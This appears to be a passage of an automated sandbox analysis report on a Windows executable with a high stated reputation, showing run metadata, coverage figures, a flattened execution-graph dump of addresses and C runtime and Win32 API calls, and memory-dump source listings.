                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true


Execution Graph

Execution Coverage: 3.1%
Dynamic/Decrypted Code Coverage: 1.9%
Signature Coverage: 8.4%
Total number of Nodes: 1764
Total number of Limit Nodes: 154
93949->93972 93953 455926 GetExitCodeProcess 93955 455952 CloseHandle 93953->93955 93956 45593c WaitForSingleObject 93953->93956 93954 455445 Sleep 93954->93977 93955->93972 93956->93955 93956->93977 93957 455432 Sleep 93957->93954 93958 448c4b 108 API calls 93958->93972 93959 3e2c79 107 API calls 93959->93972 93961 4559ae Sleep 93961->93977 93962 3e1caa 49 API calls 93962->93977 93965 3ece19 48 API calls 93965->93972 93968 3ed6e9 55 API calls 93968->93972 93972->93943 93972->93949 93972->93953 93972->93954 93972->93957 93972->93958 93972->93959 93972->93961 93972->93965 93972->93968 93972->93977 94929 424cbe 49 API calls Mailbox 93972->94929 94930 3e1caa 49 API calls 93972->94930 94931 3e2aae 346 API calls 93972->94931 94933 43ccb2 50 API calls 93972->94933 94934 427a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 93972->94934 94935 426532 63 API calls 3 library calls 93972->94935 93974 3ed6e9 55 API calls 93974->93977 93975 42cc5c 86 API calls 93975->93977 93976 3ece19 48 API calls 93976->93977 93977->93925 93977->93927 93977->93931 93977->93935 93977->93936 93977->93937 93977->93939 93977->93940 93977->93941 93977->93942 93977->93944 93977->93946 93977->93947 93977->93954 93977->93962 93977->93972 93977->93974 93977->93975 93977->93976 94836 3ef110 93977->94836 94901 3f45e0 93977->94901 94919 3eeed0 346 API calls Mailbox 93977->94919 94920 3eef00 86 API calls 93977->94920 94921 3f3200 346 API calls 2 library calls 93977->94921 94922 3fe244 TranslateAcceleratorW 93977->94922 94923 3fdc5f IsDialogMessageW GetClassLongW 93977->94923 94928 448d23 48 API calls 93977->94928 94932 3efe30 346 API calls __cinit 93977->94932 93978->93781 93979->93756 93980->93765 93981->93776 93983 3ed7f7 48 API calls 93982->93983 93984 3e61db 93983->93984 93985 3e6009 93984->93985 93986 3e6016 __ftell_nolock 93985->93986 93987 3e6a63 48 API calls 93986->93987 93991 3e617c Mailbox 93986->93991 93989 3e6048 93987->93989 93997 3e607e Mailbox 
93989->93997 94072 3e61a6 93989->94072 93990 3e614f 93990->93991 93992 3ece19 48 API calls 93990->93992 93991->93807 93994 3e6170 93992->93994 93993 3ece19 48 API calls 93993->93997 93996 3e64cf 48 API calls 93994->93996 93995 3e61a6 48 API calls 93995->93997 93996->93991 93997->93990 93997->93991 93997->93993 93997->93995 93998 3e64cf 48 API calls 93997->93998 93998->93997 94075 3e41a9 93999->94075 94002 3e3a06 94002->93813 94005 452ff0 94007 401c9d _free 47 API calls 94005->94007 94008 452ffd 94007->94008 94009 3e4252 84 API calls 94008->94009 94010 453006 94009->94010 94010->94010 94012 3ff4ea 48 API calls 94011->94012 94013 3e6237 94012->94013 94013->93818 94015 3ed6f4 94014->94015 94017 3ed71b 94015->94017 94577 3ed764 55 API calls 94015->94577 94017->93821 94019 3ed654 94018->94019 94026 3ed67e 94018->94026 94020 3ed65b 94019->94020 94022 3ed6c2 94019->94022 94021 3ed666 94020->94021 94027 3ed6ab 94020->94027 94578 3ed9a0 53 API calls __cinit 94021->94578 94022->94027 94580 3fdce0 53 API calls 94022->94580 94026->93829 94027->94026 94579 3fdce0 53 API calls 94027->94579 94029 3e641f 94028->94029 94030 3e6406 94028->94030 94031 3e6a63 48 API calls 94029->94031 94032 3e6eed 48 API calls 94030->94032 94033 3e62d1 94031->94033 94032->94033 94034 400fa7 94033->94034 94035 400fb3 94034->94035 94036 401028 94034->94036 94043 400fd8 94035->94043 94581 407c0e 47 API calls __getptd_noexit 94035->94581 94583 40103a 59 API calls 3 library calls 94036->94583 94038 401035 94038->93835 94040 400fbf 94582 406e10 8 API calls __cftog_l 94040->94582 94042 400fca 94042->93835 94043->93835 94045 3fc064 94044->94045 94047 3fc069 Mailbox 94044->94047 94584 3fc1af 48 API calls 94045->94584 94049 3fc077 94047->94049 94585 3fc15c 48 API calls 94047->94585 94050 3ff4ea 48 API calls 94049->94050 94052 3fc152 94049->94052 94051 3fc108 94050->94051 94053 3ff4ea 48 API calls 94051->94053 94052->93866 94054 3fc113 94053->94054 94054->93866 94056 3f1cf6 94055->94056 94059 3f1ba2 94055->94059 
94056->93874 94058 3f1c5d 94058->93874 94061 3ff4ea 48 API calls 94059->94061 94069 3f1bae 94059->94069 94060 3f1bb9 94060->94058 94064 3ff4ea 48 API calls 94060->94064 94062 4549c4 94061->94062 94063 3ff4ea 48 API calls 94062->94063 94070 4549cf 94063->94070 94065 3f1c9f 94064->94065 94066 3f1cb2 94065->94066 94586 3e2925 48 API calls 94065->94586 94066->93874 94068 3ff4ea 48 API calls 94068->94070 94069->94060 94587 3fc15c 48 API calls 94069->94587 94070->94068 94070->94069 94071->93874 94073 3ebdfa 48 API calls 94072->94073 94074 3e61b1 94073->94074 94074->93989 94140 3e4214 94075->94140 94080 454f73 94083 3e4252 84 API calls 94080->94083 94081 3e41d4 LoadLibraryExW 94150 3e4291 94081->94150 94085 454f7a 94083->94085 94086 3e4291 3 API calls 94085->94086 94088 454f82 94086->94088 94176 3e44ed 94088->94176 94089 3e41fb 94089->94088 94090 3e4207 94089->94090 94092 3e4252 84 API calls 94090->94092 94094 3e39fe 94092->94094 94094->94002 94099 42c396 94094->94099 94096 454fa9 94182 3e4950 94096->94182 94098 454fb6 94100 3e4517 83 API calls 94099->94100 94101 42c405 94100->94101 94355 42c56d 94 API calls 2 library calls 94101->94355 94103 42c417 94104 3e44ed 64 API calls 94103->94104 94130 42c41b 94103->94130 94105 42c432 94104->94105 94106 3e44ed 64 API calls 94105->94106 94107 42c442 94106->94107 94108 3e44ed 64 API calls 94107->94108 94109 42c45d 94108->94109 94110 3e44ed 64 API calls 94109->94110 94111 42c478 94110->94111 94112 3e4517 83 API calls 94111->94112 94113 42c48f 94112->94113 94114 40395c std::exception::_Copy_str 47 API calls 94113->94114 94115 42c496 94114->94115 94116 40395c std::exception::_Copy_str 47 API calls 94115->94116 94117 42c4a0 94116->94117 94118 3e44ed 64 API calls 94117->94118 94119 42c4b4 94118->94119 94356 42bf5a GetSystemTimeAsFileTime 94119->94356 94121 42c4c7 94122 42c4f1 94121->94122 94123 42c4dc 94121->94123 94125 42c556 94122->94125 94126 42c4f7 94122->94126 94124 401c9d _free 47 API calls 94123->94124 94127 42c4e2 94124->94127 
94129 401c9d _free 47 API calls 94125->94129 94357 42b965 118 API calls __fcloseall 94126->94357 94131 401c9d _free 47 API calls 94127->94131 94129->94130 94130->94005 94134 3e4252 94130->94134 94131->94130 94132 42c54e 94133 401c9d _free 47 API calls 94132->94133 94133->94130 94135 3e425c 94134->94135 94137 3e4263 94134->94137 94358 4035e4 94135->94358 94138 3e4272 94137->94138 94139 3e4283 FreeLibrary 94137->94139 94138->94005 94139->94138 94187 3e4339 94140->94187 94143 3e423c 94145 3e41bb 94143->94145 94146 3e4244 FreeLibrary 94143->94146 94147 403499 94145->94147 94146->94145 94195 4034ae 94147->94195 94149 3e41c8 94149->94080 94149->94081 94274 3e42e4 94150->94274 94154 3e41ec 94157 3e4380 94154->94157 94155 3e42c1 FreeLibrary 94155->94154 94156 3e42b8 94156->94154 94156->94155 94158 3ff4ea 48 API calls 94157->94158 94159 3e4395 94158->94159 94160 3e47b7 48 API calls 94159->94160 94161 3e43a1 ___crtGetEnvironmentStringsW 94160->94161 94162 3e4499 94161->94162 94163 3e44d1 94161->94163 94167 3e43dc 94161->94167 94282 3e406b CreateStreamOnHGlobal 94162->94282 94293 42c750 93 API calls 94163->94293 94164 3e4950 57 API calls 94173 3e43e5 94164->94173 94167->94164 94168 3e44ed 64 API calls 94168->94173 94169 3e4479 94169->94089 94171 454ed7 94172 3e4517 83 API calls 94171->94172 94174 454eeb 94172->94174 94173->94168 94173->94169 94173->94171 94288 3e4517 94173->94288 94175 3e44ed 64 API calls 94174->94175 94175->94169 94177 3e44ff 94176->94177 94178 454fc0 94176->94178 94317 40381e 94177->94317 94181 42bf5a GetSystemTimeAsFileTime 94181->94096 94183 3e495f 94182->94183 94184 455002 94182->94184 94337 403e65 94183->94337 94186 3e4967 94186->94098 94191 3e434b 94187->94191 94190 3e4321 LoadLibraryA GetProcAddress 94190->94143 94192 3e422f 94191->94192 94193 3e4354 LoadLibraryA 94191->94193 94192->94143 94192->94190 94193->94192 94194 3e4365 GetProcAddress 94193->94194 94194->94192 94197 4034ba _raise 94195->94197 94196 4034cd 94243 407c0e 47 API calls 
__getptd_noexit 94196->94243 94197->94196 94200 4034fe 94197->94200 94199 4034d2 94244 406e10 8 API calls __cftog_l 94199->94244 94214 40e4c8 94200->94214 94203 403503 94204 403519 94203->94204 94205 40350c 94203->94205 94207 403543 94204->94207 94208 403523 94204->94208 94245 407c0e 47 API calls __getptd_noexit 94205->94245 94228 40e5e0 94207->94228 94246 407c0e 47 API calls __getptd_noexit 94208->94246 94210 4034dd _raise @_EH4_CallFilterFunc@8 94210->94149 94215 40e4d4 _raise 94214->94215 94216 407cf4 __lock 47 API calls 94215->94216 94217 40e4e2 94216->94217 94218 40e559 94217->94218 94224 407d7c __mtinitlocknum 47 API calls 94217->94224 94226 40e552 94217->94226 94251 404e5b 48 API calls __lock 94217->94251 94252 404ec5 LeaveCriticalSection LeaveCriticalSection _doexit 94217->94252 94253 4069d0 47 API calls std::exception::_Copy_str 94218->94253 94221 40e560 94223 40e56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 94221->94223 94221->94226 94222 40e5cc _raise 94222->94203 94223->94226 94224->94217 94248 40e5d7 94226->94248 94229 40e600 __wopenfile 94228->94229 94230 40e61a 94229->94230 94242 40e7d5 94229->94242 94260 40185b 59 API calls 2 library calls 94229->94260 94258 407c0e 47 API calls __getptd_noexit 94230->94258 94232 40e61f 94259 406e10 8 API calls __cftog_l 94232->94259 94234 40354e 94247 403570 LeaveCriticalSection LeaveCriticalSection _fseek 94234->94247 94235 40e838 94255 4163c9 94235->94255 94238 40e7ce 94238->94242 94261 40185b 59 API calls 2 library calls 94238->94261 94240 40e7ed 94240->94242 94262 40185b 59 API calls 2 library calls 94240->94262 94242->94230 94242->94235 94243->94199 94244->94210 94245->94210 94246->94210 94247->94210 94254 407e58 LeaveCriticalSection 94248->94254 94250 40e5de 94250->94222 94251->94217 94252->94217 94253->94221 94254->94250 94263 415bb1 94255->94263 94257 4163e2 94257->94234 94258->94232 94259->94234 94260->94238 94261->94240 94262->94242 94264 415bbd _raise 94263->94264 94265 415bcf 
94264->94265 94268 415c06 94264->94268 94266 407c0e __cftog_l 47 API calls 94265->94266 94267 415bd4 94266->94267 94269 406e10 __cftog_l 8 API calls 94267->94269 94270 415c78 __wsopen_helper 110 API calls 94268->94270 94273 415bde _raise 94269->94273 94271 415c23 94270->94271 94272 415c4c __wsopen_helper LeaveCriticalSection 94271->94272 94272->94273 94273->94257 94278 3e42f6 94274->94278 94277 3e42cc LoadLibraryA GetProcAddress 94277->94156 94279 3e42aa 94278->94279 94280 3e42ff LoadLibraryA 94278->94280 94279->94156 94279->94277 94280->94279 94281 3e4310 GetProcAddress 94280->94281 94281->94279 94283 3e4085 FindResourceExW 94282->94283 94285 3e40a2 94282->94285 94284 454f16 LoadResource 94283->94284 94283->94285 94284->94285 94286 454f2b SizeofResource 94284->94286 94285->94167 94286->94285 94287 454f3f LockResource 94286->94287 94287->94285 94289 454fe0 94288->94289 94290 3e4526 94288->94290 94294 403a8d 94290->94294 94292 3e4534 94292->94173 94293->94167 94297 403a99 _raise 94294->94297 94295 403aa7 94307 407c0e 47 API calls __getptd_noexit 94295->94307 94297->94295 94298 403acd 94297->94298 94309 404e1c 94298->94309 94299 403aac 94308 406e10 8 API calls __cftog_l 94299->94308 94302 403ad3 94315 4039fe 81 API calls 4 library calls 94302->94315 94304 403ab7 _raise 94304->94292 94305 403ae2 94316 403b04 LeaveCriticalSection LeaveCriticalSection _fseek 94305->94316 94307->94299 94308->94304 94310 404e2c 94309->94310 94311 404e4e EnterCriticalSection 94309->94311 94310->94311 94312 404e34 94310->94312 94313 404e44 94311->94313 94314 407cf4 __lock 47 API calls 94312->94314 94313->94302 94314->94313 94315->94305 94316->94304 94320 403839 94317->94320 94319 3e4510 94319->94181 94321 403845 _raise 94320->94321 94322 403888 94321->94322 94323 40385b _memset 94321->94323 94324 403880 _raise 94321->94324 94325 404e1c __lock_file 48 API calls 94322->94325 94333 407c0e 47 API calls __getptd_noexit 94323->94333 94324->94319 94327 40388e 94325->94327 94335 40365b 62 API calls 
5 library calls 94327->94335 94328 403875 94334 406e10 8 API calls __cftog_l 94328->94334 94331 4038a4 94336 4038c2 LeaveCriticalSection LeaveCriticalSection _fseek 94331->94336 94333->94328 94334->94324 94335->94331 94336->94324 94338 403e71 _raise 94337->94338 94339 403e94 94338->94339 94340 403e7f 94338->94340 94342 404e1c __lock_file 48 API calls 94339->94342 94351 407c0e 47 API calls __getptd_noexit 94340->94351 94344 403e9a 94342->94344 94343 403e84 94352 406e10 8 API calls __cftog_l 94343->94352 94353 403b0c 55 API calls 4 library calls 94344->94353 94347 403ea5 94354 403ec5 LeaveCriticalSection LeaveCriticalSection _fseek 94347->94354 94349 403eb7 94350 403e8f _raise 94349->94350 94350->94186 94351->94343 94352->94350 94353->94347 94354->94349 94355->94103 94356->94121 94357->94132 94359 4035f0 _raise 94358->94359 94360 403604 94359->94360 94361 40361c 94359->94361 94387 407c0e 47 API calls __getptd_noexit 94360->94387 94363 404e1c __lock_file 48 API calls 94361->94363 94368 403614 _raise 94361->94368 94365 40362e 94363->94365 94364 403609 94388 406e10 8 API calls __cftog_l 94364->94388 94371 403578 94365->94371 94368->94137 94372 403587 94371->94372 94373 40359b 94371->94373 94430 407c0e 47 API calls __getptd_noexit 94372->94430 94375 403597 94373->94375 94390 402c84 94373->94390 94389 403653 LeaveCriticalSection LeaveCriticalSection _fseek 94375->94389 94376 40358c 94431 406e10 8 API calls __cftog_l 94376->94431 94383 4035b5 94407 40e9d2 94383->94407 94385 4035bb 94385->94375 94386 401c9d _free 47 API calls 94385->94386 94386->94375 94387->94364 94388->94368 94389->94368 94391 402c97 94390->94391 94395 402cbb 94390->94395 94392 402933 __fclose_nolock 47 API calls 94391->94392 94391->94395 94393 402cb4 94392->94393 94432 40af61 94393->94432 94396 40eb36 94395->94396 94397 4035af 94396->94397 94398 40eb43 94396->94398 94400 402933 94397->94400 94398->94397 94399 401c9d _free 47 API calls 94398->94399 94399->94397 94401 402952 94400->94401 94402 40293d 
94400->94402 94401->94383 94538 407c0e 47 API calls __getptd_noexit 94402->94538 94404 402942 94539 406e10 8 API calls __cftog_l 94404->94539 94406 40294d 94406->94383 94408 40e9de _raise 94407->94408 94409 40e9e6 94408->94409 94410 40e9fe 94408->94410 94555 407bda 47 API calls __getptd_noexit 94409->94555 94412 40ea7b 94410->94412 94415 40ea28 94410->94415 94559 407bda 47 API calls __getptd_noexit 94412->94559 94413 40e9eb 94556 407c0e 47 API calls __getptd_noexit 94413->94556 94419 40a8ed ___lock_fhandle 49 API calls 94415->94419 94417 40ea80 94560 407c0e 47 API calls __getptd_noexit 94417->94560 94421 40ea2e 94419->94421 94420 40ea88 94561 406e10 8 API calls __cftog_l 94420->94561 94423 40ea41 94421->94423 94424 40ea4c 94421->94424 94540 40ea9c 94423->94540 94557 407c0e 47 API calls __getptd_noexit 94424->94557 94426 40e9f3 _raise 94426->94385 94428 40ea47 94558 40ea73 LeaveCriticalSection __unlock_fhandle 94428->94558 94430->94376 94431->94375 94433 40af6d _raise 94432->94433 94434 40af75 94433->94434 94435 40af8d 94433->94435 94530 407bda 47 API calls __getptd_noexit 94434->94530 94437 40b022 94435->94437 94442 40afbf 94435->94442 94535 407bda 47 API calls __getptd_noexit 94437->94535 94438 40af7a 94531 407c0e 47 API calls __getptd_noexit 94438->94531 94441 40b027 94536 407c0e 47 API calls __getptd_noexit 94441->94536 94457 40a8ed 94442->94457 94443 40af82 _raise 94443->94395 94446 40b02f 94537 406e10 8 API calls __cftog_l 94446->94537 94447 40afc5 94449 40afd8 94447->94449 94450 40afeb 94447->94450 94466 40b043 94449->94466 94532 407c0e 47 API calls __getptd_noexit 94450->94532 94453 40afe4 94534 40b01a LeaveCriticalSection __unlock_fhandle 94453->94534 94454 40aff0 94533 407bda 47 API calls __getptd_noexit 94454->94533 94458 40a8f9 _raise 94457->94458 94459 40a946 EnterCriticalSection 94458->94459 94461 407cf4 __lock 47 API calls 94458->94461 94460 40a96c _raise 94459->94460 94460->94447 94462 40a91d 94461->94462 94463 40a928 
InitializeCriticalSectionAndSpinCount 94462->94463 94464 40a93a 94462->94464 94463->94464 94465 40a970 ___lock_fhandle LeaveCriticalSection 94464->94465 94465->94459 94467 40b050 __ftell_nolock 94466->94467 94468 40b0ac 94467->94468 94469 40b08d 94467->94469 94500 40b082 94467->94500 94474 40b105 94468->94474 94475 40b0e9 94468->94475 94471 407bda __set_osfhnd 47 API calls 94469->94471 94470 40a70c __cftog_l 6 API calls 94472 40b86b 94470->94472 94473 40b092 94471->94473 94472->94453 94476 407c0e __cftog_l 47 API calls 94473->94476 94477 40b11c 94474->94477 94480 40f82f __lseeki64_nolock 49 API calls 94474->94480 94478 407bda __set_osfhnd 47 API calls 94475->94478 94479 40b099 94476->94479 94481 413bf2 __stbuf 47 API calls 94477->94481 94482 40b0ee 94478->94482 94483 406e10 __cftog_l 8 API calls 94479->94483 94480->94477 94484 40b12a 94481->94484 94485 407c0e __cftog_l 47 API calls 94482->94485 94483->94500 94487 40b44b 94484->94487 94492 407a0d ____lc_codepage_func 47 API calls 94484->94492 94486 40b0f5 94485->94486 94488 406e10 __cftog_l 8 API calls 94486->94488 94489 40b463 94487->94489 94490 40b7b8 WriteFile 94487->94490 94488->94500 94493 40b55a 94489->94493 94498 40b479 94489->94498 94491 40b7e1 GetLastError 94490->94491 94502 40b410 94490->94502 94491->94502 94495 40b150 GetConsoleMode 94492->94495 94504 40b663 94493->94504 94507 40b565 94493->94507 94494 40b81b 94494->94500 94501 407c0e __cftog_l 47 API calls 94494->94501 94495->94487 94496 40b189 94495->94496 94496->94487 94497 40b199 GetConsoleCP 94496->94497 94497->94502 94525 40b1c2 94497->94525 94498->94494 94499 40b4e9 WriteFile 94498->94499 94499->94491 94503 40b526 94499->94503 94500->94470 94505 40b843 94501->94505 94502->94494 94502->94500 94506 40b7f7 94502->94506 94503->94498 94503->94502 94515 40b555 94503->94515 94504->94494 94508 40b6d8 WideCharToMultiByte 94504->94508 94509 407bda __set_osfhnd 47 API calls 94505->94509 94510 40b812 94506->94510 94511 40b7fe 94506->94511 94507->94494 94512 
40b5de WriteFile 94507->94512 94508->94491 94523 40b71f 94508->94523 94509->94500 94513 407bed __dosmaperr 47 API calls 94510->94513 94516 407c0e __cftog_l 47 API calls 94511->94516 94512->94491 94514 40b62d 94512->94514 94513->94500 94514->94502 94514->94507 94514->94515 94515->94502 94518 40b803 94516->94518 94517 40b727 WriteFile 94520 40b77a GetLastError 94517->94520 94517->94523 94521 407bda __set_osfhnd 47 API calls 94518->94521 94519 401688 __chsize_nolock 57 API calls 94519->94525 94520->94523 94521->94500 94522 4140f7 59 API calls __chsize_nolock 94522->94525 94523->94502 94523->94504 94523->94515 94523->94517 94524 415884 WriteConsoleW CreateFileW __chsize_nolock 94527 40b2f6 94524->94527 94525->94502 94525->94519 94525->94522 94526 40b28f WideCharToMultiByte 94525->94526 94525->94527 94526->94502 94528 40b2ca WriteFile 94526->94528 94527->94491 94527->94502 94527->94524 94527->94525 94529 40b321 WriteFile 94527->94529 94528->94491 94528->94527 94529->94491 94529->94527 94530->94438 94531->94443 94532->94454 94533->94453 94534->94443 94535->94441 94536->94446 94537->94443 94538->94404 94539->94406 94562 40aba4 94540->94562 94542 40eb00 94575 40ab1e 48 API calls 2 library calls 94542->94575 94544 40eaaa 94544->94542 94545 40eade 94544->94545 94547 40aba4 __close_nolock 47 API calls 94544->94547 94545->94542 94548 40aba4 __close_nolock 47 API calls 94545->94548 94546 40eb08 94550 40eb2a 94546->94550 94576 407bed 47 API calls 3 library calls 94546->94576 94551 40ead5 94547->94551 94549 40eaea CloseHandle 94548->94549 94549->94542 94552 40eaf6 GetLastError 94549->94552 94550->94428 94554 40aba4 __close_nolock 47 API calls 94551->94554 94552->94542 94554->94545 94555->94413 94556->94426 94557->94428 94558->94426 94559->94417 94560->94420 94561->94426 94563 40abc4 94562->94563 94564 40abaf 94562->94564 94566 407bda __set_osfhnd 47 API calls 94563->94566 94568 40abe9 94563->94568 94565 407bda __set_osfhnd 47 API calls 94564->94565 94567 40abb4 94565->94567 94569 
40abf3 94566->94569 94570 407c0e __cftog_l 47 API calls 94567->94570 94568->94544 94571 407c0e __cftog_l 47 API calls 94569->94571 94573 40abbc 94570->94573 94572 40abfb 94571->94572 94574 406e10 __cftog_l 8 API calls 94572->94574 94573->94544 94574->94573 94575->94546 94576->94550 94577->94017 94578->94026 94579->94026 94580->94027 94581->94040 94582->94042 94583->94038 94584->94047 94585->94049 94586->94066 94587->94060 94589 40f8a0 __ftell_nolock 94588->94589 94590 3e40b4 GetLongPathNameW 94589->94590 94591 3e6a63 48 API calls 94590->94591 94592 3e40dc 94591->94592 94593 3e49a0 94592->94593 94594 3ed7f7 48 API calls 94593->94594 94595 3e49b2 94594->94595 94596 3e660f 49 API calls 94595->94596 94597 3e49bd 94596->94597 94598 3e49c8 94597->94598 94602 452e35 94597->94602 94599 3e64cf 48 API calls 94598->94599 94601 3e49d4 94599->94601 94640 3e28a6 94601->94640 94604 452e4f 94602->94604 94646 3fd35e 60 API calls 94602->94646 94605 3e49e7 Mailbox 94605->93890 94607 3e41a9 136 API calls 94606->94607 94608 3e415e 94607->94608 94609 453489 94608->94609 94611 3e41a9 136 API calls 94608->94611 94610 42c396 122 API calls 94609->94610 94612 45349e 94610->94612 94613 3e4172 94611->94613 94614 4534a2 94612->94614 94615 4534bf 94612->94615 94613->94609 94616 3e417a 94613->94616 94617 3e4252 84 API calls 94614->94617 94618 3ff4ea 48 API calls 94615->94618 94619 3e4186 94616->94619 94620 4534aa 94616->94620 94617->94620 94637 453504 Mailbox 94618->94637 94647 3ec833 94619->94647 94749 426b49 87 API calls _wprintf 94620->94749 94623 4534b8 94623->94615 94625 4536b4 94626 401c9d _free 47 API calls 94625->94626 94627 4536bc 94626->94627 94628 3e4252 84 API calls 94627->94628 94633 4536c5 94628->94633 94632 401c9d _free 47 API calls 94632->94633 94633->94632 94635 3e4252 84 API calls 94633->94635 94753 4225b5 86 API calls 4 library calls 94633->94753 94635->94633 94636 3ece19 48 API calls 94636->94637 94637->94625 94637->94633 94637->94636 94735 3eba85 94637->94735 94743 3e4dd9 
94637->94743 94750 422551 48 API calls ___crtGetEnvironmentStringsW 94637->94750 94751 422472 60 API calls 2 library calls 94637->94751 94752 429c12 48 API calls 94637->94752 94641 3e28b8 94640->94641 94645 3e28d7 ___crtGetEnvironmentStringsW 94640->94645 94643 3ff4ea 48 API calls 94641->94643 94642 3ff4ea 48 API calls 94644 3e28ee 94642->94644 94643->94645 94644->94605 94645->94642 94646->94602 94648 3ec843 __ftell_nolock 94647->94648 94649 453095 94648->94649 94650 3ec860 94648->94650 94778 4225b5 86 API calls 4 library calls 94649->94778 94759 3e48ba 49 API calls 94650->94759 94653 4530a8 94779 4225b5 86 API calls 4 library calls 94653->94779 94654 3ec882 94760 3e4550 56 API calls 94654->94760 94656 3ec897 94656->94653 94657 3ec89f 94656->94657 94659 3ed7f7 48 API calls 94657->94659 94661 3ec8ab 94659->94661 94660 4530c4 94663 3ec90c 94660->94663 94761 3fe968 49 API calls __ftell_nolock 94661->94761 94664 4530d7 94663->94664 94665 3ec91a 94663->94665 94667 3e4907 CloseHandle 94664->94667 94764 401dfc 94665->94764 94666 3ec8b7 94668 3ed7f7 48 API calls 94666->94668 94670 4530e3 94667->94670 94671 3ec8c3 94668->94671 94672 3e41a9 136 API calls 94670->94672 94673 3e660f 49 API calls 94671->94673 94674 45310d 94672->94674 94675 3ec8d1 94673->94675 94677 453136 94674->94677 94680 42c396 122 API calls 94674->94680 94762 3feb66 SetFilePointerEx ReadFile 94675->94762 94676 3ec943 _wcscat _wcscpy 94679 3ec96d SetCurrentDirectoryW 94676->94679 94780 4225b5 86 API calls 4 library calls 94677->94780 94683 3ff4ea 48 API calls 94679->94683 94684 453129 94680->94684 94681 3ec8fd 94763 3e46ce SetFilePointerEx SetFilePointerEx 94681->94763 94687 3ec988 94683->94687 94688 453131 94684->94688 94689 453152 94684->94689 94686 45314d 94718 3ecad1 Mailbox 94686->94718 94690 3e47b7 48 API calls 94687->94690 94691 3e4252 84 API calls 94688->94691 94692 3e4252 84 API calls 94689->94692 94722 3ec993 Mailbox __NMSG_WRITE 94690->94722 94691->94677 94693 453157 94692->94693 94694 3ff4ea 48 
API calls 94693->94694 94701 453194 94694->94701 94695 3eca9d 94774 3e4907 94695->94774 94699 3e3d98 94699->93756 94699->93764 94700 3ecaa9 SetCurrentDirectoryW 94700->94718 94703 3eba85 48 API calls 94701->94703 94704 4531dd Mailbox 94703->94704 94706 4533ce 94704->94706 94721 3eba85 48 API calls 94704->94721 94727 3ece19 48 API calls 94704->94727 94730 453420 94704->94730 94781 422551 48 API calls ___crtGetEnvironmentStringsW 94704->94781 94782 422472 60 API calls 2 library calls 94704->94782 94783 429c12 48 API calls 94704->94783 94784 3fc682 48 API calls 94704->94784 94785 429b72 48 API calls 94706->94785 94707 453467 94789 4225b5 86 API calls 4 library calls 94707->94789 94710 453480 94710->94695 94712 4533f0 94786 4429e8 48 API calls ___crtGetEnvironmentStringsW 94712->94786 94714 4533fd 94717 401c9d _free 47 API calls 94714->94717 94716 45345f 94788 42240b 48 API calls 3 library calls 94716->94788 94717->94718 94754 3e48dd 94718->94754 94719 3ece19 48 API calls 94719->94722 94721->94704 94722->94695 94722->94707 94722->94716 94722->94719 94767 3eb337 56 API calls _wcscpy 94722->94767 94768 3fc258 GetStringTypeW 94722->94768 94769 3ecb93 59 API calls __wcsnicmp 94722->94769 94770 3ecb5a GetStringTypeW __NMSG_WRITE 94722->94770 94771 4016d0 GetStringTypeW __towlower_l 94722->94771 94772 3ecc24 162 API calls 3 library calls 94722->94772 94773 3fc682 48 API calls 94722->94773 94727->94704 94787 4225b5 86 API calls 4 library calls 94730->94787 94732 453439 94733 401c9d _free 47 API calls 94732->94733 94734 45344c 94733->94734 94734->94718 94736 3ebb25 94735->94736 94739 3eba98 ___crtGetEnvironmentStringsW 94735->94739 94738 3ff4ea 48 API calls 94736->94738 94737 3ff4ea 48 API calls 94741 3eba9f 94737->94741 94738->94739 94739->94737 94740 3ebac8 94740->94637 94741->94740 94742 3ff4ea 48 API calls 94741->94742 94742->94740 94744 3e4dec 94743->94744 94747 3e4e9a 94743->94747 94745 3ff4ea 48 API calls 94744->94745 94748 3e4e1e 94744->94748 94745->94748 94746 3ff4ea 
48 API calls 94746->94748 94747->94637 94748->94746 94748->94747 94749->94623 94750->94637 94751->94637 94752->94637 94753->94633 94755 3e4907 CloseHandle 94754->94755 94756 3e48e5 Mailbox 94755->94756 94757 3e4907 CloseHandle 94756->94757 94758 3e48fc 94757->94758 94758->94699 94759->94654 94760->94656 94761->94666 94762->94681 94763->94663 94790 401e46 94764->94790 94767->94722 94768->94722 94769->94722 94770->94722 94771->94722 94772->94722 94773->94722 94775 3e4920 94774->94775 94776 3e4911 94774->94776 94775->94776 94777 3e4925 CloseHandle 94775->94777 94776->94700 94777->94776 94778->94653 94779->94660 94780->94686 94781->94704 94782->94704 94783->94704 94784->94704 94785->94712 94786->94714 94787->94732 94788->94707 94789->94710 94791 401e61 94790->94791 94795 401e55 94790->94795 94814 407c0e 47 API calls __getptd_noexit 94791->94814 94793 402019 94798 401e41 94793->94798 94815 406e10 8 API calls __cftog_l 94793->94815 94795->94791 94800 401ed4 94795->94800 94809 409d6b 47 API calls __cftog_l 94795->94809 94797 401fa0 94797->94791 94797->94798 94801 401fb0 94797->94801 94798->94676 94799 401f5f 94799->94791 94802 401f7b 94799->94802 94811 409d6b 47 API calls __cftog_l 94799->94811 94800->94791 94808 401f41 94800->94808 94810 409d6b 47 API calls __cftog_l 94800->94810 94813 409d6b 47 API calls __cftog_l 94801->94813 94802->94791 94802->94798 94804 401f91 94802->94804 94812 409d6b 47 API calls __cftog_l 94804->94812 94808->94797 94808->94799 94809->94800 94810->94808 94811->94802 94812->94798 94813->94798 94814->94793 94815->94798 94817 3e4c8b 94816->94817 94818 3e4d94 94816->94818 94817->94818 94819 3ff4ea 48 API calls 94817->94819 94818->93896 94820 3e4cb2 94819->94820 94821 3ff4ea 48 API calls 94820->94821 94822 3e4d22 94821->94822 94822->94818 94824 3e4dd9 48 API calls 94822->94824 94826 3eba85 48 API calls 94822->94826 94829 3eb470 91 API calls 2 library calls 94822->94829 94830 429af1 48 API calls 94822->94830 94824->94822 94826->94822 94827->93899 

Control-flow Graph

(graph image not reproduced; legend: Executed / Not Executed)
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
